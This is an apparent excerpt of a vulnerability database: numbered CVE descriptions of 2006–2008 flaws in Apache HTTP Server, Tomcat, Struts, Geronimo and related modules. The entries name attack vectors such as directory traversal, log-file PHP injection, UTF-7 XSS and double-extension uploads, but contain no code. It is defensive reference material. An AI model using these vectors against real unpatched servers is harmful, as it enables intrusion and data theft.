13570| [CVE-2008-4308] The doRead method in Apache Tomcat 4.1.32 through 4.1.34 and 5.5.10 through 5.5.20 does not return a -1 to indicate when a certain error condition has occurred, which can cause Tomcat to send POST content from one request to a different request.
13571| [CVE-2008-4008] Unspecified vulnerability in the WebLogic Server Plugins for Apache component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2008 CPU. Oracle has not commented on reliable researcher claims that this issue is a stack-based buffer overflow in the WebLogic Apache Connector, related to an invalid parameter.
13572| [CVE-2008-3666] Unspecified vulnerability in Sun Solaris 10 and OpenSolaris before snv_96 allows (1) context-dependent attackers to cause a denial of service (panic) via vectors involving creation of a crafted file and use of the sendfilev system call, as demonstrated by a file served by an Apache 2.2.x web server with EnableSendFile configured
13573| [CVE-2008-3271] Apache Tomcat 5.5.0 and 4.1.0 through 4.1.31 allows remote attackers to bypass an IP address restriction and obtain sensitive information via a request that is processed concurrently with another request but in a different thread, leading to an instance-variable overwrite associated with a "synchronization problem" and lack of thread safety, and related to RemoteFilterValve, RemoteAddrValve, and RemoteHostValve.
13574| [CVE-2008-3257] Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.
13575| [CVE-2008-2939] Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI.
13576| [CVE-2008-2938] Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.
13577| [CVE-2008-2742] Unrestricted file upload in the mcpuk file editor (atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php) in Achievo 1.2.0 through 1.3.2 allows remote attackers to execute arbitrary code by uploading a file with .php followed by a safe extension, then accessing it via a direct request to the file in the Achievo root directory. NOTE: this is only a vulnerability in environments that support multiple extensions, such as Apache with the mod_mime module enabled.
13578| [CVE-2008-2717] TYPO3 4.0.x before 4.0.9, 4.1.x before 4.1.7, and 4.2.x before 4.2.1, uses an insufficiently restrictive default fileDenyPattern for Apache, which allows remote attackers bypass security restrictions and upload configuration files such as .htaccess, or conduct file upload attacks using multiple extensions.
13579| [CVE-2008-2579] Unspecified vulnerability in the WebLogic Server Plugins for Apache, Sun and IIS web servers component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 has unknown impact and remote attack vectors.
13580| [CVE-2008-2384] SQL injection vulnerability in mod_auth_mysql.c in the mod-auth-mysql (aka libapache2-mod-auth-mysql) module for the Apache HTTP Server 2.x, when configured to use a multibyte character set that allows a \ (backslash) as part of the character encoding, allows remote attackers to execute arbitrary SQL commands via unspecified inputs in a login request.
13581| [CVE-2008-2370] Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when a RequestDispatcher is used, performs path normalization before removing the query string from the URI, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a .. (dot dot) in a request parameter.
13582| [CVE-2008-2364] The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses.
13583| [CVE-2008-2168] Cross-site scripting (XSS) vulnerability in Apache 2.2.6 and earlier allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded URLs that are not properly handled when displaying the 403 Forbidden error page.
13584| [CVE-2008-2025] Cross-site scripting (XSS) vulnerability in Apache Struts before 1.2.9-162.31.1 on SUSE Linux Enterprise (SLE) 11, before 1.2.9-108.2 on SUSE openSUSE 10.3, before 1.2.9-198.2 on SUSE openSUSE 11.0, and before 1.2.9-162.163.2 on SUSE openSUSE 11.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "insufficient quoting of parameters."
13585| [CVE-2008-1947] Cross-site scripting (XSS) vulnerability in Apache Tomcat 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to host-manager/html/add.
13586| [CVE-2008-1734] Interpretation conflict in PHP Toolkit before 1.0.1 on Gentoo Linux might allow local users to cause a denial of service (PHP outage) and read contents of PHP scripts by creating a file with a one-letter lowercase alphabetic name, which triggers interpretation of a certain unquoted [a-z] argument as a matching shell glob for this name, rather than interpretation as the literal [a-z] regular-expression string, and consequently blocks the launch of the PHP interpreter within the Apache HTTP Server.
13587| [CVE-2008-1678] Memory leak in the zlib_stateful_init function in crypto/comp/c_zlib.c in libssl in OpenSSL 0.9.8f through 0.9.8h allows remote attackers to cause a denial of service (memory consumption) via multiple calls, as demonstrated by initial SSL client handshakes to the Apache HTTP Server mod_ssl that specify a compression algorithm.
13588| [CVE-2008-1232] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.
13589| [CVE-2008-0869] Cross-site scripting (XSS) vulnerability in BEA WebLogic Workshop 8.1 through SP6 and Workshop for WebLogic 9.0 through 10.0 allows remote attackers to inject arbitrary web script or HTML via a "framework defined request parameter" when using WebLogic Workshop or Apache Beehive NetUI framework with page flows.
13590| [CVE-2008-0732] The init script for Apache Geronimo on SUSE Linux follows symlinks when performing a chown operation, which might allow local users to obtain access to unspecified files or directories.
13591| [CVE-2008-0555] The ExpandCert function in Apache-SSL before apache_1.3.41+ssl_1.59 does not properly handle (1) '/' and (2) '=' characters in a Distinguished Name (DN) in a client certificate, which might allow remote attackers to bypass authentication via a crafted DN that triggers overwriting of environment variables.
13592| [CVE-2008-0457] Unrestricted file upload vulnerability in the FileUpload class running on the Symantec LiveState Apache Tomcat server, as used by Symantec Backup Exec System Recovery Manager 7.0 and 7.0.1, allows remote attackers to upload and execute arbitrary JSP files via unknown vectors.
13593| [CVE-2008-0456] CRLF injection vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks by uploading a file with a multi-line name containing HTTP header sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
13594| [CVE-2008-0455] Cross-site scripting (XSS) vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary web script or HTML by uploading a file with a name containing XSS sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
13595| [CVE-2008-0128] The SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apache Tomcat before 5.5.21 does not set the secure flag for the JSESSIONIDSSO cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.
13596| [CVE-2008-0005] mod_proxy_ftp in Apache 2.2.x before 2.2.7-dev, 2.0.x before 2.0.62-dev, and 1.3.x before 1.3.40-dev does not define a charset, which allows remote attackers to conduct cross-site scripting (XSS) attacks using UTF-7 encoding.
13597| [CVE-2008-0002] Apache Tomcat 6.0.0 through 6.0.15 processes parameters in the context of the wrong request when an exception occurs during parameter processing, which might allow remote attackers to obtain sensitive information, as demonstrated by disconnecting during this processing in order to trigger the exception.
13598| [CVE-2007-6750] The Apache HTTP Server 1.x and 2.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris, related to the lack of the mod_reqtimeout module in versions before 2.2.15.
13599| [CVE-2007-6726] Multiple cross-site scripting (XSS) vulnerabilities in Dojo 0.4.1 and 0.4.2, as used in Apache Struts and other products, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) xip_client.html and (2) xip_server.html in src/io/.
13600| [CVE-2007-6514] Apache HTTP Server, when running on Linux with a document root on a Windows share mounted using smbfs, allows remote attackers to obtain unprocessed content such as source files for .php programs via a trailing "\" (backslash), which is not handled by the intended AddType directive.
13601| [CVE-2007-6423] ** DISPUTED ** Unspecified vulnerability in mod_proxy_balancer for Apache HTTP Server 2.2.x before 2.2.7-dev, when running on Windows, allows remote attackers to trigger memory corruption via a long URL. NOTE: the vendor could not reproduce this issue.
13602| [CVE-2007-6422] The balancer_handler function in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6, when a threaded Multi-Processing Module is used, allows remote authenticated users to cause a denial of service (child process crash) via an invalid bb variable.
13603| [CVE-2007-6421] Cross-site scripting (XSS) vulnerability in balancer-manager in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) ss, (2) wr, or (3) rr parameters, or (4) the URL.
13604| [CVE-2007-6420] Cross-site request forgery (CSRF) vulnerability in the balancer-manager in mod_proxy_balancer for Apache HTTP Server 2.2.x allows remote attackers to gain privileges via unspecified vectors.
13605| [CVE-2007-6388] Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13606| [CVE-2007-6361] Gekko 0.8.2 and earlier stores sensitive information under the web root with possibly insufficient access control, which might allow remote attackers to read certain files under temp/, as demonstrated by a log file that records the titles of blog entries. NOTE: access to temp/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
13607| [CVE-2007-6342] SQL injection vulnerability in the David Castro AuthCAS module (AuthCAS.pm) 0.4 for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the SESSION_COOKIE_NAME (session ID) in a cookie.
13608| [CVE-2007-6286] Apache Tomcat 5.5.11 through 5.5.25 and 6.0.0 through 6.0.15, when the native APR connector is used, does not properly handle an empty request to the SSL port, which allows remote attackers to trigger handling of "a duplicate copy of one of the recent requests," as demonstrated by using netcat to send the empty request.
13609| [CVE-2007-6258] Multiple stack-based buffer overflows in the legacy mod_jk2 2.0.3-DEV and earlier Apache module allow remote attackers to execute arbitrary code via a long (1) Host header, or (2) Hostname within a Host header.
13610| [CVE-2007-6231] Multiple PHP remote file inclusion vulnerabilities in tellmatic 1.0.7 allow remote attackers to execute arbitrary PHP code via a URL in the tm_includepath parameter to (1) Classes.inc.php, (2) statistic.inc.php, (3) status.inc.php, (4) status_top_x.inc.php, or (5) libchart-1.1/libchart.php in include/. NOTE: access to include/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
13611| [CVE-2007-6203] Apache HTTP Server 2.0.x and 2.2.x does not sanitize the HTTP Method specifier header from an HTTP request when it is reflected back in a "413 Request Entity Too Large" error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated via an HTTP request containing an invalid Content-length value, a similar issue to CVE-2006-3918.
13612| [CVE-2007-5797] SQLLoginModule in Apache Geronimo 2.0 through 2.1 does not throw an exception for a nonexistent username, which allows remote attackers to bypass authentication via a login attempt with any username not contained in the database.
13613| [CVE-2007-5731] Absolute path traversal vulnerability in Apache Jakarta Slide 2.1 and earlier allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag, a related issue to CVE-2007-5461.
13614| [CVE-2007-5461] Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.
13615| [CVE-2007-5342] The default catalina.policy in the JULI logging component in Apache Tomcat 5.5.9 through 5.5.25 and 6.0.0 through 6.0.15 does not restrict certain permissions for web applications, which allows attackers to modify logging configuration options and overwrite arbitrary files, as demonstrated by changing the (1) level, (2) directory, and (3) prefix attributes in the org.apache.juli.FileHandler handler.
13616| [CVE-2007-5333] Apache Tomcat 6.0.0 through 6.0.14, 5.5.0 through 5.5.25, and 4.1.0 through 4.1.36 does not properly handle (1) double quote (") characters or (2) %5C (encoded backslash) sequences in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks. NOTE: this issue exists because of an incomplete fix for CVE-2007-3385.
13617| [CVE-2007-5156] Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload.php in FCKeditor, as used in SiteX CMS 0.7.3.beta, La-Nai CMS, Syntax CMS, Cardinal Cms, and probably other products, allows remote attackers to upload and execute arbitrary PHP code via a file whose name contains ".php." and has an unknown extension, which is recognized as a .php file by the Apache HTTP server, a different vulnerability than CVE-2006-0658 and CVE-2006-2529.
13618| [CVE-2007-5085] Unspecified vulnerability in the management EJB (MEJB) in Apache Geronimo before 2.0.2 allows remote attackers to bypass authentication and obtain "access to Geronimo internals" via unspecified vectors.
13619| [CVE-2007-5000] Cross-site scripting (XSS) vulnerability in the (1) mod_imap module in the Apache HTTP Server 1.3.0 through 1.3.39 and 2.0.35 through 2.0.61 and the (2) mod_imagemap module in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13620| [CVE-2007-4724] Cross-site request forgery (CSRF) vulnerability in cal2.jsp in the calendar examples application in Apache Tomcat 4.1.31 allows remote attackers to add events as arbitrary users via the time and description parameters.
13621| [CVE-2007-4723] Directory traversal vulnerability in Ragnarok Online Control Panel 4.3.4a, when the Apache HTTP Server is used, allows remote attackers to bypass authentication via directory traversal sequences in a URI that ends with the name of a publicly available page, as demonstrated by a "/...../" sequence and an account_manage.php/login.php final component for reaching the protected account_manage.php page.
13622| [CVE-2007-4641] Directory traversal vulnerability in index.php in Pakupaku CMS 0.4 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting code into an Apache log file.
13623| [CVE-2007-4556] Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
13624| [CVE-2007-4548] The login method in LoginModule implementations in Apache Geronimo 2.0 does not throw FailedLoginException for failed logins, which allows remote attackers to bypass authentication requirements, deploy arbitrary modules, and gain administrative access by sending a blank username and password with the command line deployer in the deployment module.
13625| [CVE-2007-4465] Cross-site scripting (XSS) vulnerability in mod_autoindex.c in the Apache HTTP Server before 2.2.6, when the charset on a server-generated page is not defined, allows remote attackers to inject arbitrary web script or HTML via the P parameter using the UTF-7 charset. NOTE: it could be argued that this issue is due to a design limitation of browsers that attempt to perform automatic content type detection.
13626| [CVE-2007-3847] The date handling code in modules/proxy/proxy_util.c (mod_proxy) in Apache 2.3.0, when using a threaded MPM, allows remote origin servers to cause a denial of service (caching forward proxy process crash) via crafted date headers that trigger a buffer over-read.
13627| [CVE-2007-3571] The Apache Web Server as used in Novell NetWare 6.5 and GroupWise allows remote attackers to obtain sensitive information via a certain directive to Apache that causes the HTTP-Header response to be modified, which may reveal the server's internal IP address.
13628| [CVE-2007-3386] Cross-site scripting (XSS) vulnerability in the Host Manager Servlet for Apache Tomcat 6.0.0 to 6.0.13 and 5.5.0 to 5.5.24 allows remote attackers to inject arbitrary HTML and web script via crafted requests, as demonstrated using the aliases parameter to an html/add action.
13629| [CVE-2007-3385] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 does not properly handle the \" character sequence in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks.
13630| [CVE-2007-3384] Multiple cross-site scripting (XSS) vulnerabilities in examples/servlet/CookieExample in Apache Tomcat 3.3 through 3.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Value field, related to error messages.
13631| [CVE-2007-3383] Cross-site scripting (XSS) vulnerability in SendMailServlet in the examples web application (examples/jsp/mail/sendmail.jsp) in Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.36 allows remote attackers to inject arbitrary web script or HTML via the From field and possibly other fields, related to generation of error messages.
13632| [CVE-2007-3382] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 treats single quotes ("'") as delimiters in cookies, which might cause sensitive information such as session IDs to be leaked and allow remote attackers to conduct session hijacking attacks.
13633| [CVE-2007-3304] Apache httpd 1.3.37, 2.0.59, and 2.2.4 with the Prefork MPM module, allows local users to cause a denial of service by modifying the worker_score and process_score arrays to reference an arbitrary process ID, which is sent a SIGUSR1 signal from the master process, aka "SIGUSR1 killer."
13634| [CVE-2007-3303] Apache httpd 2.0.59 and 2.2.4, with the Prefork MPM module, allows local users to cause a denial of service via certain code sequences executed in a worker process that (1) stop request processing by killing all worker processes and preventing creation of replacements or (2) hang the system by forcing the master process to fork an arbitrarily large number of worker processes. NOTE: This might be an inherent design limitation of Apache with respect to worker processes in hosted environments.
13635| [CVE-2007-3101] Multiple cross-site scripting (XSS) vulnerabilities in certain JSF applications in Apache MyFaces Tomahawk before 1.1.6 allow remote attackers to inject arbitrary web script via the autoscroll parameter, which is injected into Javascript that is sent to the client.
13636| [CVE-2007-2450] Multiple cross-site scripting (XSS) vulnerabilities in the (1) Manager and (2) Host Manager web applications in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote authenticated users to inject arbitrary web script or HTML via a parameter name to manager/html/upload, and other unspecified vectors.
13637| [CVE-2007-2449] Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the '
13638| [CVE-2007-2353] Apache Axis 1.0 allows remote attackers to obtain sensitive information by requesting a non-existent WSDL file, which reveals the installation path in the resulting exception message.
13639| [CVE-2007-2025] Unrestricted file upload vulnerability in the UpLoad feature (lib/plugin/UpLoad.php) in PhpWiki 1.3.11p1 allows remote attackers to upload arbitrary PHP files with a double extension, as demonstrated by .php.3, which is interpreted by Apache as being a valid PHP file.
13640| [CVE-2007-1863] cache_util.c in the mod_cache module in Apache HTTP Server (httpd), when caching is enabled and a threaded Multi-Processing Module (MPM) is used, allows remote attackers to cause a denial of service (child processing handler crash) via a request with the (1) s-maxage, (2) max-age, (3) min-fresh, or (4) max-stale Cache-Control headers without a value.
13641| [CVE-2007-1862] The recall_headers function in mod_mem_cache in Apache 2.2.4 does not properly copy all levels of header data, which can cause Apache to return HTTP headers containing previously used data, which could be used by remote attackers to obtain potentially sensitive information.
13642| [CVE-2007-1860] mod_jk in Apache Tomcat JK Web Server Connector 1.2.x before 1.2.23 decodes request URLs within the Apache HTTP Server before passing the URL to Tomcat, which allows remote attackers to access protected pages via a crafted prefix JkMount, possibly involving double-encoded .. (dot dot) sequences and directory traversal, a related issue to CVE-2007-0450.
13643| [CVE-2007-1858] The default SSL cipher configuration in Apache Tomcat 4.1.28 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.17 uses certain insecure ciphers, including the anonymous cipher, which allows remote attackers to obtain sensitive information or have other, unspecified impacts.
13644| [CVE-2007-1842] Directory traversal vulnerability in login.php in JSBoard before 2.0.12 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the table parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, a related issue to CVE-2006-2019.
13645| [CVE-2007-1801] Directory traversal vulnerability in inc/lang.php in sBLOG 0.7.3 Beta allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the conf_lang_default parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by inc/lang.php.
13646| [CVE-2007-1743] suexec in Apache HTTP Server (httpd) 2.2.3 does not verify combinations of user and group IDs on the command line, which might allow local users to leverage other vulnerabilities to create arbitrary UID/GID owned files if /proc is mounted. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root." In addition, because this is dependent on other vulnerabilities, perhaps this is resultant and should not be included in CVE.
13647| [CVE-2007-1742] suexec in Apache HTTP Server (httpd) 2.2.3 uses a partial comparison for verifying whether the current directory is within the document root, which might allow local users to perform unauthorized operations on incorrect directories, as demonstrated using "html_backup" and "htmleditor" under an "html" directory. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
13648| [CVE-2007-1741] Multiple race conditions in suexec in Apache HTTP Server (httpd) 2.2.3 between directory and file validation, and their usage, allow local users to gain privileges and execute arbitrary code by renaming directories or performing symlink attacks. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
13649| [CVE-2007-1720] Directory traversal vulnerability in addressbook.php in the Addressbook 1.2 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the module_name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file.
13650| [CVE-2007-1636] Directory traversal vulnerability in index.php in RoseOnlineCMS 3 B1 allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the op parameter, as demonstrated by injecting PHP code into Apache log files via the URL and User-Agent HTTP header.
13651| [CVE-2007-1633] Directory traversal vulnerability in bbcode_ref.php in the Giorgio Ciranni Splatt Forum 4.0 RC1 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by bbcode_ref.php.
13652| [CVE-2007-1577] Directory traversal vulnerability in index.php in GeBlog 0.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the GLOBALS[tplname] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
13653| [CVE-2007-1539] Directory traversal vulnerability in inc/map.func.php in pragmaMX Landkarten 2.1 module allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the module_name parameter, as demonstrated via a static PHP code injection attack in an Apache log file.
13654| [CVE-2007-1524] Directory traversal vulnerability in themes/default/ in ZomPlog 3.7.6 and earlier allows remote attackers to include arbitrary local files via a .. (dot dot) in the settings[skin] parameter, as demonstrated by injecting PHP code into an Apache HTTP Server log file, which can then be included via themes/default/.
13655| [CVE-2007-1491] Apache Tomcat in Avaya S87XX, S8500, and S8300 before CM 3.1.3, and Avaya SES allows connections from external interfaces via port 8009, which exposes it to attacks from outside parties.
13656| [CVE-2007-1358] Cross-site scripting (XSS) vulnerability in certain applications using Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.34 allows remote attackers to inject arbitrary web script or HTML via crafted "Accept-Language headers that do not conform to RFC 2616".
13657| [CVE-2007-1349] PerlRun.pm in Apache mod_perl before 1.30, and RegistryCooker.pm in mod_perl 2.x, does not properly escape PATH_INFO before use in a regular expression, which allows remote attackers to cause a denial of service (resource consumption) via a crafted URI.
13658| [CVE-2007-0975] Variable extraction vulnerability in Ian Bezanson Apache Stats before 0.0.3 beta allows attackers to overwrite critical variables, with unknown impact, when the extract function is used on the _REQUEST superglobal array.
13659| [CVE-2007-0930] Variable extract vulnerability in Apache Stats before 0.0.3beta allows attackers to modify arbitrary variables and conduct attacks via unknown vectors involving the use of PHP's extract function.
13660| [CVE-2007-0792] The mod_perl initialization script in Bugzilla 2.23.3 does not set the Bugzilla Apache configuration to allow .htaccess permissions to override file permissions, which allows remote attackers to obtain the database username and password via a direct request for the localconfig file.
13661| [CVE-2007-0774] Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute arbitrary code via a long URL that triggers the overflow in a URI worker map routine.
13662| [CVE-2007-0637] Directory traversal vulnerability in zd_numer.php in Galeria Zdjec 3.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the galeria parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by zd_numer.php.
13663| [CVE-2007-0451] Apache SpamAssassin before 3.1.8 allows remote attackers to cause a denial of service via long URLs in malformed HTML, which triggers "massive memory usage."
13664| [CVE-2007-0450] Directory traversal vulnerability in Apache HTTP Server and Tomcat 5.x before 5.5.22 and 6.x before 6.0.10, when using certain proxy modules (mod_proxy, mod_rewrite, mod_jk), allows remote attackers to read arbitrary files via a .. (dot dot) sequence with combinations of (1) "/" (slash), (2) "\" (backslash), and (3) URL-encoded backslash (%5C) characters in the URL, which are valid separators in Tomcat but not in Apache.
13665| [CVE-2007-0419] The BEA WebLogic Server proxy plug-in before June 2006 for the Apache HTTP Server does not properly handle protocol errors, which allows remote attackers to cause a denial of service (server outage).
13666| [CVE-2007-0173] Directory traversal vulnerability in index.php in L2J Statistik Script 0.09 and earlier, when register_globals is enabled and magic_quotes is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
13667| [CVE-2007-0098] Directory traversal vulnerability in language.php in VerliAdmin 0.3 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
13668| [CVE-2007-0086] ** DISPUTED ** The Apache HTTP Server, when accessed through a TCP connection with a large window size, allows remote attackers to cause a denial of service (network bandwidth consumption) via a Range header that specifies multiple copies of the same fragment. NOTE: the severity of this issue has been disputed by third parties, who state that the large window size required by the attack is not normally supported or configured by the server, or that a DDoS-style attack would accomplish the same goal.
13669| [CVE-2006-7217] Apache Derby before 10.2.1.6 does not determine schema privilege requirements during the DropSchemaNode bind phase, which allows remote authenticated users to execute arbitrary drop schema statements in SQL authorization mode.
13670| [CVE-2006-7216] Apache Derby before 10.2.1.6 does not determine privilege requirements for lock table statements at compilation time, and consequently does not enforce privilege requirements at execution time, which allows remote authenticated users to lock arbitrary tables.
13671| [CVE-2006-7197] The AJP connector in Apache Tomcat 5.5.15 uses an incorrect length for chunks, which can cause a buffer over-read in the ajp_process_callback in mod_jk, which allows remote attackers to read portions of sensitive memory.
13672| [CVE-2006-7196] Cross-site scripting (XSS) vulnerability in the calendar application example in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.15 allows remote attackers to inject arbitrary web script or HTML via the time parameter to cal2.jsp and possibly unspecified other vectors. NOTE: this may be related to CVE-2006-0254.1.
13673| [CVE-2006-7195] Cross-site scripting (XSS) vulnerability in implicit-objects.jsp in Apache Tomcat 5.0.0 through 5.0.30 and 5.5.0 through 5.5.17 allows remote attackers to inject arbitrary web script or HTML via certain header values.
13674| [CVE-2006-7098] The Debian GNU/Linux 033_-F_NO_SETSID patch for the Apache HTTP Server 1.3.34-4 does not properly disassociate httpd from a controlling tty when httpd is started interactively, which allows local users to gain privileges to that tty via a CGI program that calls the TIOCSTI ioctl.
13675| [CVE-2006-6869] Directory traversal vulnerability in includes/search/search_mdforum.php in MAXdev MDForum 2.0.1 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang cookie to error.php, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
13676| [CVE-2006-6675] Cross-site scripting (XSS) vulnerability in Novell NetWare 6.5 Support Pack 5 and 6 and Novell Apache on NetWare 2.0.48 allows remote attackers to inject arbitrary web script or HTML via unspecifeid parameters in Welcome web-app.
13677| [CVE-2006-6613] Directory traversal vulnerability in language.php in phpAlbum 0.4.1 Beta 6 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files or obtain sensitive information via a .. (dot dot) in the pa_lang[include_file] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
13678| [CVE-2006-6589] Cross-site scripting (XSS) vulnerability in ecommerce/control/keywordsearch in the Apache Open For Business Project (OFBiz) and Opentaps 0.9.3 allows remote attackers to inject arbitrary web script or HTML via the SEARCH_STRING parameter, a different issue than CVE-2006-6587. NOTE: some of these details are obtained from third party information.
13679| [CVE-2006-6588] The forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) trusts the (1) dataResourceTypeId, (2) contentTypeId, and certain other hidden form fields, which allows remote attackers to create unauthorized types of content, modify content, or have other unknown impact.
